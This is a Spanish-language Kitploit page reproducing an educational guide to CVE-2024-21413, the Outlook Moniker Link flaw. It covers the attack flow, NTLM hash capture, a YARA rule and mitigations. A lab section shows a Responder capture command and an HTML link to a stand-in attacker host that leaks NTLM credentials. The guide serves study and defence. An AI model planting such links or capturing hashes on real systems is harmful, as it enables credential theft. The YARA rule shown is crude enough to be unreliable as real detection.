Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Moniker-Link--CVE-2024-21413- — Guía educativa sobre CVE-2024-21413, la vulnerabilidad de Moniker Link de Outlook de cero clics, que cubre el flujo de ataque, captura de credenciales NTLM, detección con YARA y estrategias de mitigación. | Kitploit
Herramientas/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Descifrado de ContraseñasHerramientas de PhishingAnálisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSMovimiento LateralPruebas de PenetraciónAprendizaje y EducaciónRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Seguridad de Correo Electrónico
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Guía educativa sobre CVE-2024-21413, la vulnerabilidad de Moniker Link de Outlook de cero clics, que cubre el flujo de ataque, captura de credenciales NTLM, detección con YARA y estrategias de mitigación.

Ver Repositorio
7hace 4 mesesAún no revisado

🔗 Moniker Link (CVE-2024-21413) — Una Guía Práctica de la Vulnerabilidad de Clic Cero en Outlook


📌 1. Introducción

CVE-2024-21413, comúnmente conocida como la vulnerabilidad Moniker Link, es un fallo de seguridad crítico en Microsoft Outlook que permite a los atacantes filtrar credenciales de usuario sin requerir ninguna interacción.

A diferencia de los ataques de phishing tradicionales, esta vulnerabilidad puede activarse simplemente previsualizando un correo electrónico, lo que la hace particularmente peligrosa en entornos empresariales.

El problema surge de cómo Outlook procesa los enlaces moniker, lo que provoca intentos de autenticación no deseados en sistemas controlados por atacantes.


🧠 2. Conceptos Clave

Comprender los siguientes conceptos es esencial:

🔹 Enlace Moniker

Un mecanismo específico de Windows que permite a las aplicaciones hacer referencia a recursos externos usando protocolos como:

  • file://
  • unc://

🔹 Autenticación NTLM

  • Un protocolo de autenticación heredado de Windows
  • Envía automáticamente credenciales hasheadas al acceder a recursos remotos
  • Susceptible a ataques de captura y retransmisión de credenciales

🔹 Ruta UNC (Convención de Nomenclatura Universal)

root@kitploit:~
\\attacker-server\share

Se utiliza para acceder a recursos compartidos a través de una red. En esta vulnerabilidad, se abusa de él para forzar solicitudes de autenticación.

🔹 Bypass de Vista Protegida

La Vista Protegida de Outlook está diseñada para aislar contenido potencialmente inseguro. Esta vulnerabilidad elude esa protección, permitiendo el acceso a recursos externos.


⚙️ 3. Cómo Funciona

Flujo del Ataque (Paso a Paso)

  1. Elaboración del Payload

    • El atacante incrusta un enlace moniker malicioso (ej., file://attacker-server/share) dentro de un correo electrónico.
  2. Entrega

    • El correo se envía a la víctima.
  3. Activación

    • La víctima previsualiza o abre el correo en Outlook.
  4. Procesamiento Automático

    • Outlook procesa el enlace sin interacción del usuario.
  5. Solicitud de Autenticación

    • Windows intenta la autenticación NTLM con el servidor del atacante.
  6. Exposición de Credenciales

    • El atacante captura el hash NTLM.

Diagrama del Flujo del Ataque

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. Impacto en el Mundo Real

Escenarios de Ataque Comunes

  • Campañas de phishing dirigidas contra organizaciones
  • Cosecha de credenciales en redes corporativas
  • Acceso inicial para movimiento lateral

Objetivos del Atacante

  • Capturar hashes NTLM
  • Retransmitir autenticación a servicios internos
  • Escalar privilegios dentro de la red

🛠️ 5. Herramientas y Tecnologías

Herramientas Ofensivas / de Investigación

  • Responder — Captura hashes de autenticación NTLM
  • Impacket — Kit de herramientas de explotación de red
  • ntlmrelayx.py — Realiza ataques de retransmisión NTLM

Herramientas Defensivas

  • Microsoft Defender — Detección y respuesta de puntos finales
  • Wireshark — Inspección de tráfico de red
  • Sysmon — Registro avanzado de eventos del sistema

💻 6. Ejemplo Práctico (Solo en Entorno de Laboratorio)

⚠️ Realizar solo en entornos de laboratorio controlados

Iniciar Servicio de Captura NTLM

root@kitploit:~
sudo responder -I eth0

Ejemplo de Enlace Malicioso

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

Salida Esperada

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Detección (Regla YARA)

Una regla de detección fue desarrollada por Florian Roth para identificar intentos de explotación que involucran enlaces moniker.

Ejemplo de Regla YARA

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Casos de Uso de Detección

  • Escaneo de puerta de enlace de correo
  • Generación de alertas SIEM
  • Búsqueda de amenazas para enlaces sospechosos

🛡️ 8. Mitigación y Mejores Prácticas

Gestión de Parches

  • Aplicar inmediatamente las actualizaciones de seguridad proporcionadas por Microsoft

Endurecimiento de Autenticación

  • Deshabilitar NTLM cuando sea posible
  • Forzar la autenticación Kerberos

Controles de Red

  • Bloquear SMB saliente (TCP 445) a redes externas
  • Restringir conexiones salientes innecesarias

Seguridad del Correo Electrónico

  • Filtrar o desinfectar enlaces file:// y basados en UNC
  • Usar soluciones avanzadas de protección contra amenazas de correo electrónico

Monitoreo y Detección

  • Monitorear intentos de autenticación salientes
  • Registrar y alertar sobre tráfico SMB inusual

⚠️ 9. Errores Comunes

  • Asumir que se requiere interacción del usuario
  • Ignorar los riesgos relacionados con NTLM en entornos modernos
  • Confiar únicamente en el antivirus sin controles de red
  • Retrasar la implementación de parches

🧾 10. Conclusión

CVE-2024-21413 demuestra cómo comportamientos del sistema profundamente integrados (como la autenticación automática) pueden ser explotados a través de entradas aparentemente inofensivas como los enlaces de correo electrónico.

Conclusiones Clave

  • Vulnerabilidad de clic cero — no se requiere interacción del usuario
  • Explota el manejo de enlaces moniker por parte de Outlook
  • Resulta en fuga de credenciales NTLM
  • Detectable usando YARA y monitoreo de red
  • Prevenible mediante parches y configuración adecuada

📚 11. Lecturas Adicionales

  • Aviso de Seguridad de Microsoft — CVE-2024-21413
  • Documentación de Impacket (Ataques de Retransmisión NTLM)
  • Documentación de YARA
  • Hoja de Referencia de Autenticación de OWASP

💡 Recomendación: Reproduzca esta vulnerabilidad en un laboratorio virtual (ej., VM Windows + VM atacante) para comprender completamente la cadena de ataque y las estrategias defensivas.

Descargar herramienta